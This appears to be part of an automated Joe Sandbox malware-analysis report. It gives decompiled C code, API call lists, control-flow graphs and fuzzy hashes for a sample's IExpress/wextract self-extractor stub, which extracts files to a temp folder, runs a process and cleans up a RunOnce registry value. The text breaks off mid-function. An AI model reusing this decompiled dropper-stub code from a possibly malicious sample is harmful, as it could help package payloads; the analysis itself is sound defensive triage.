                                                                                                                                                                                                                                                • Instruction ID: d1f0b7178b659f573d501cdb27873e74d1b21aa8e19b8273aa7b2121eb6349ae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a47dd271f5a74e9751732fae02410c059e6c32ddc745ab92564fd71e9d97a3c7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B041E335A05334CFEB729B68F8457AE77E4BB44720F34801AE941E7291CF7A48828B81
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 631 258c8-258d5 632 258d8-258dd 631->632 632->632 633 258df-258f1 LocalAlloc 632->633 634 258f3-25901 call 244b9 633->634 635 25919-25959 call 21680 call 2658a CreateFileA LocalFree 633->635 638 25906-25910 call 26285 634->638 635->638 645 2595b-2596c CloseHandle GetFileAttributesA 635->645 644 25912-25918 638->644 645->638 646 2596e-25970 645->646 646->638 647 25972-2597b 646->647 647->644
                                                                                                                                                                                                                                                C-Code - Quality: 95%
                                                                                                                                                                                                                                                			E000258C8(intOrPtr* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				intOrPtr _t6;
                                                                                                                                                                                                                                                				void* _t10;
                                                                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                                                                				void* _t14;
                                                                                                                                                                                                                                                				signed char _t16;
                                                                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                                                                				intOrPtr* _t27;
                                                                                                                                                                                                                                                				CHAR* _t33;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_push(__ecx);
                                                                                                                                                                                                                                                				_t33 = __ecx;
                                                                                                                                                                                                                                                				_t27 = __ecx;
                                                                                                                                                                                                                                                				_t23 = __ecx + 1;
                                                                                                                                                                                                                                                				do {
                                                                                                                                                                                                                                                					_t6 =  *_t27;
                                                                                                                                                                                                                                                					_t27 = _t27 + 1;
                                                                                                                                                                                                                                                				} while (_t6 != 0);
                                                                                                                                                                                                                                                				_t36 = _t27 - _t23 + 0x14;
                                                                                                                                                                                                                                                				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                                                                                                                                                                                                				if(_t20 != 0) {
                                                                                                                                                                                                                                                					E00021680(_t20, _t36, _t33);
                                                                                                                                                                                                                                                					E0002658A(_t20, _t36, "TMP4351$.TMP");
                                                                                                                                                                                                                                                					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                                                                                                                                                                                                					_v8 = _t10;
                                                                                                                                                                                                                                                					LocalFree(_t20);
                                                                                                                                                                                                                                                					_t12 = _v8;
                                                                                                                                                                                                                                                					if(_t12 == 0xffffffff) {
                                                                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                                                						CloseHandle(_t12);
                                                                                                                                                                                                                                                						_t16 = GetFileAttributesA(_t33); // executed
                                                                                                                                                                                                                                                						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                                                                                                                                                                                                							goto L4;
                                                                                                                                                                                                                                                						} else {
                                                                                                                                                                                                                                                							 *0x29124 = 0;
                                                                                                                                                                                                                                                							_t14 = 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					L4:
                                                                                                                                                                                                                                                					 *0x29124 = E00026285();
                                                                                                                                                                                                                                                					_t14 = 0;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t14;
                                                                                                                                                                                                                                                			}













                                                                                                                                                                                                                                                0x0002590b
                                                                                                                                                                                                                                                0x00025910
                                                                                                                                                                                                                                                0x00025910
                                                                                                                                                                                                                                                0x00025918

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 000258E7
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025943
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002594D
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 0002595C
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP001.TMP\,?,00025534,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP001.TMP\,00000000), ref: 00025963
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$TMP4351$.TMP
                                                                                                                                                                                                                                                • API String ID: 747627703-2825630923
                                                                                                                                                                                                                                                • Opcode ID: 3001df2058558950bbd64b05271e52403736726ea681a0dde9f4bfd82de3fd34
                                                                                                                                                                                                                                                • Instruction ID: 37c778184615913ba48bf63df18677e4da27f1d8ccbb87836149736161325fc1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3001df2058558950bbd64b05271e52403736726ea681a0dde9f4bfd82de3fd34
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53112231B00630ABE7305F7ABC4DB9B7E9EDF86370F204615B50AD31C2CE78984686A4
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 675 23fef-24010 676 24016-2403b CreateProcessA 675->676 677 2410a-2411a call 26ce0 675->677 678 24041-2406e WaitForSingleObject GetExitCodeProcess 676->678 679 240c4-24101 call 26285 GetLastError FormatMessageA call 244b9 676->679 681 24070-24077 678->681 682 24091 call 2411b 678->682 694 24106 679->694 681->682 685 24079-2407b 681->685 689 24096-240b8 CloseHandle * 2 682->689 685->682 688 2407d-24089 685->688 688->682 691 2408b 688->691 692 240ba-240c0 689->692 693 24108 689->693 691->682 692->693 695 240c2 692->695 693->677 694->693 695->694
                                                                                                                                                                                                                                                C-Code - Quality: 84%
                                                                                                                                                                                                                                                			E00023FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v524;
                                                                                                                                                                                                                                                				long _v528;
                                                                                                                                                                                                                                                				struct _PROCESS_INFORMATION _v544;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t20;
                                                                                                                                                                                                                                                				void* _t22;
                                                                                                                                                                                                                                                				int _t25;
                                                                                                                                                                                                                                                				intOrPtr* _t39;
                                                                                                                                                                                                                                                				signed int _t44;
                                                                                                                                                                                                                                                				void* _t49;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				intOrPtr _t53;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t45 = __edx;
                                                                                                                                                                                                                                                				_t20 =  *0x28004; // 0xf4950d3e
                                                                                                                                                                                                                                                				_v8 = _t20 ^ _t50;
                                                                                                                                                                                                                                                				_t39 = __ecx;
                                                                                                                                                                                                                                                				_t49 = 1;
                                                                                                                                                                                                                                                				_t22 = 0;
                                                                                                                                                                                                                                                				if(__ecx == 0) {
                                                                                                                                                                                                                                                					L13:
                                                                                                                                                                                                                                                					return E00026CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                                                                				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                                                                                                                                                                                                				if(_t25 == 0) {
                                                                                                                                                                                                                                                					 *0x29124 = E00026285();
                                                                                                                                                                                                                                                					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0); // executed
                                                                                                                                                                                                                                                					_t45 = 0x4c4;
                                                                                                                                                                                                                                                					E000244B9(0, 0x4c4, _t39,  &_v524, 0x10, 0); // executed
                                                                                                                                                                                                                                                					L11:
                                                                                                                                                                                                                                                					_t49 = 0;
                                                                                                                                                                                                                                                					L12:
                                                                                                                                                                                                                                                					_t22 = _t49;
                                                                                                                                                                                                                                                					goto L13;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                                                                                                                                                                                                				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                                                                                                                                                                                                				_t44 = _v528;
                                                                                                                                                                                                                                                				_t53 =  *0x28a28; // 0x0
                                                                                                                                                                                                                                                				if(_t53 == 0) {
                                                                                                                                                                                                                                                					_t34 =  *0x29a2c; // 0x0
                                                                                                                                                                                                                                                					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                                                                                                                                                                                                						_t34 = _t44 & 0xff000000;
                                                                                                                                                                                                                                                						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                                                                                                                                                                                                							 *0x29a2c = _t44;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E0002411B(_t34, _t44);
                                                                                                                                                                                                                                                				CloseHandle(_v544.hThread);
                                                                                                                                                                                                                                                				CloseHandle(_v544);
                                                                                                                                                                                                                                                				if(( *0x29a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                			}



















                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateProcessA.KERNELBASE ref: 00024033
                                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00024049
                                                                                                                                                                                                                                                • GetExitCodeProcess.KERNELBASE ref: 0002405C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0002409C
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 000240A8
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 000240DC
                                                                                                                                                                                                                                                • FormatMessageA.KERNELBASE(00001000,00000000,00000000), ref: 000240E9
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3183975587-0
                                                                                                                                                                                                                                                • Opcode ID: f2a638529e96bad22ec9b7f22c51bc16a8db45a7b57f4bbd4cdb297d869858e2
                                                                                                                                                                                                                                                • Instruction ID: 8fd34b5bc40aefc4c6e5d5d5b62b81af55f4d25505650c0b58a8544d162aa92c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2a638529e96bad22ec9b7f22c51bc16a8db45a7b57f4bbd4cdb297d869858e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C31D631640228ABFB709F65EC89FAB77BCEB95710F204199F905D2161CA344CC6CB51
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E000251E5(void* __eflags) {
                                                                                                                                                                                                                                                				int _t5;
                                                                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                                                                				void* _t28;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				_t1 = E0002468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                                                                                                                                                                                                				_t28 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                                                                				if(_t28 != 0) {
                                                                                                                                                                                                                                                					if(E0002468F("UPROMPT", _t28, _t29) != 0) {
                                                                                                                                                                                                                                                						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                                                                                                                                                                                                						if(_t5 != 0) {
                                                                                                                                                                                                                                                							_t6 = E000244B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                                                                                                                                                                                                							LocalFree(_t28);
                                                                                                                                                                                                                                                							if(_t6 != 6) {
                                                                                                                                                                                                                                                								 *0x29124 = 0x800704c7;
                                                                                                                                                                                                                                                								L10:
                                                                                                                                                                                                                                                								return 0;
                                                                                                                                                                                                                                                							}
                                                                                                                                                                                                                                                							 *0x29124 = 0;
                                                                                                                                                                                                                                                							L6:
                                                                                                                                                                                                                                                							return 1;
                                                                                                                                                                                                                                                						}
                                                                                                                                                                                                                                                						LocalFree(_t28);
                                                                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                					E000244B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                					LocalFree(_t28);
                                                                                                                                                                                                                                                					 *0x29124 = 0x80070714;
                                                                                                                                                                                                                                                					goto L10;
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				E000244B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                                				 *0x29124 = E00026285();
                                                                                                                                                                                                                                                				goto L10;
                                                                                                                                                                                                                                                			}







APIs
  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246A0
  • Part of subcall function 0002468F: SizeofResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246A9
  • Part of subcall function 0002468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 000246C3
  • Part of subcall function 0002468F: LoadResource.KERNEL32(00000000,00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246CC
  • Part of subcall function 0002468F: LockResource.KERNEL32(00000000,?,00022D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 000246D3
  • Part of subcall function 0002468F: memcpy_s.MSVCRT ref: 000246E5
  • Part of subcall function 0002468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 000246EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00022F4D,?,00000002,00000000), ref: 00025201
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00025250
  • Part of subcall function 000244B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00024518
  • Part of subcall function 000244B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00024554
  • Part of subcall function 00026285: GetLastError.KERNEL32(00025BBC), ref: 00026285
Strings
Memory Dump Source
• Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
• Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
Similarity
• API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
• String ID: <None>$UPROMPT
• API String ID: 957408736-2980973527
• Opcode ID: 71a8e8e43150c51e93e042f02e02b0c36395b3cc1ea7d6fc51b1450c47493d93
• Instruction ID: ab80928184097698b56d09ebb0c979419ba92a21477f9c77db7397712bb6eaa2
• Opcode Fuzzy Hash: 71a8e8e43150c51e93e042f02e02b0c36395b3cc1ea7d6fc51b1450c47493d93
• Instruction Fuzzy Hash: 6311E6B1700621EFE3346B717C8AB7B61DEEB8A345F204029BA06D61D1DA7D8C064129
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 74%
E000252B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
	signed int _v8;
	char _v268;
	signed int _t9;
	signed int _t11;
	void* _t21;
	void* _t29;
	CHAR** _t31;
	void* _t32;
	signed int _t33;

	_t28 = __edi;
	_t22 = __ecx;
	_t21 = __ebx;
	_t9 =  *0x28004; // 0xf4950d3e
	_v8 = _t9 ^ _t33;
	_push(__esi);
	_t31 =  *0x291e0; // 0x2a58e90
	if(_t31 != 0) {
		_push(__edi);
		do {
			_t29 = _t31;
			if( *0x28a24 == 0 &&  *0x29a30 == 0) {
				SetFileAttributesA( *_t31, 0x80); // executed
				DeleteFileA( *_t31); // executed
			}
			_t31 = _t31[1];
			LocalFree( *_t29);
			LocalFree(_t29);
		} while (_t31 != 0);
		_pop(_t28);
	}
	_t11 =  *0x28a20; // 0x0
	_pop(_t32);
	if(_t11 != 0 &&  *0x28a24 == 0 &&  *0x29a30 == 0) {
		_push(_t22);
		E00021781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
		if(( *0x29a34 & 0x00000020) != 0) {
			E000265E8( &_v268);
		}
		SetCurrentDirectoryA(".."); // executed
		_t22 =  &_v268;
		E00022390( &_v268);
		_t11 =  *0x28a20; // 0x0
	}
	if( *0x29a40 != 1 && _t11 != 0) {
		_t11 = E00021FE1(_t22); // executed
	}
	 *0x28a20 =  *0x28a20 & 0x00000000;
	return E00026CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
}












                                                                                                                                                                                                                                                0x00025374
                                                                                                                                                                                                                                                0x00025374
                                                                                                                                                                                                                                                0x00025381
                                                                                                                                                                                                                                                0x00025387
                                                                                                                                                                                                                                                0x00025387
                                                                                                                                                                                                                                                0x0002538f
                                                                                                                                                                                                                                                0x000253a0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(02A58E90,00000080,?,00000000), ref: 000252F2
                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(02A58E90), ref: 000252FA
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(02A58E90,?,00000000), ref: 00025305
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(02A58E90), ref: 0002530C
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(000211FC,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00025363
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00025334
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                                                                • API String ID: 2833751637-1116576409
                                                                                                                                                                                                                                                • Opcode ID: 77fadbbe4cc3d27e62a6e6d46c53b67ff56afcbbf9ec7fa8a40db33050e0ecbd
                                                                                                                                                                                                                                                • Instruction ID: f744df01d62c72bbdb231273c6a5f7d4d62cda509d2ec0a1b91be6df8c694c01
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 77fadbbe4cc3d27e62a6e6d46c53b67ff56afcbbf9ec7fa8a40db33050e0ecbd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 53212331901624DFFB70DB10FC4ABA973F0BB04341F204159E882521A5CFB85E86CB89
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E00021FE1(void* __ecx) {
                                                                                                                                                                                                                                                				void* _v8;
                                                                                                                                                                                                                                                				long _t4;
                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                				if( *0x28530 != 0) {
                                                                                                                                                                                                                                                					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                                                                                                                                                                                                					if(_t4 == 0) {
                                                                                                                                                                                                                                                						RegDeleteValueA(_v8, "wextract_cleanup1"); // executed
                                                                                                                                                                                                                                                						return RegCloseKey(_v8);
                                                                                                                                                                                                                                                					}
                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                				return _t4;
                                                                                                                                                                                                                                                			}






                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0002538C,?,?,0002538C), ref: 00022005
                                                                                                                                                                                                                                                • RegDeleteValueA.KERNELBASE(0002538C,wextract_cleanup1,?,?,0002538C), ref: 00022017
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(0002538C,?,?,0002538C), ref: 00022020
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000001.00000002.387924667.0000000000021000.00000020.00000001.01000000.00000004.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387915086.0000000000020000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387940375.0000000000028000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                • Associated: 00000001.00000002.387959099.000000000002C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_20000_gck46uD.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup1
                                                                                                                                                                                                                                                • API String ID: 849931509-1592051331
                                                                                                                                                                                                                                                • Opcode ID: 3fbeef61538692a247ddb4faac7ed81823a5baacac5356b93f042a40fecbfa20
                                                                                                                                                                                                                                                • Instruction ID: 1041649ac341ce304e175116f8be8522c52536476d647310b162d83d11abb674
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3fbeef61538692a247ddb4faac7ed81823a5baacac5356b93f042a40fecbfa20
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E3E04F34A51328FBEB318BD0FC8EF597B69EB01780F2002D4BA04A0061EF655E15D705
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E00024CD0(char* __edx, long _a4, int _a8) {
                                                                                                                                                                                                                                                				signed int _v8;
                                                                                                                                                                                                                                                				char _v268;
                                                                                                                                                                                                                                                				void* __ebx;
                                                                                                                                                                                                                                                				void* __edi;
                                                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                                                				signed int _t29;
                                                                                                                                                                                                                                                				int _t30;
                                                                                                                                                                                                                                                				long _t32;
                                                                                                                                                                                                                                                				signed int _t33;
                                                                                                                                                                                                                                                				long _t35;
                                                                                                                                                                                                                                                				long _t36;
                                                                                                                                                                                                                                                				struct HWND__* _t37;
                                                                                                                                                                                                                                                				long _t38;
                                                                                                                                                                                                                                                				long _t39;
                                                                                                                                                                                                                                                				long _t41;
                                                                                                                                                                                                                                                				long _t44;
                                                                                                                                                                                                                                                				long _t45;
                                                                                                                                                                                                                                                				long _t46;
                                                                                                                                                                                                                                                				signed int _t50;
                                                                                                                                                                                                                                                				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x28004; // 0xf4950d3e
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x291d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E00024E99(_t75);
						L35:
						return E00026CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x28584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x291e4;
						_t58 = 0x291e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x291e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x291e4;
						_t30 = E00024702( &_v268, 0x291e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E0002476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E00024980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E000247E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x293f4 =  *0x293f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
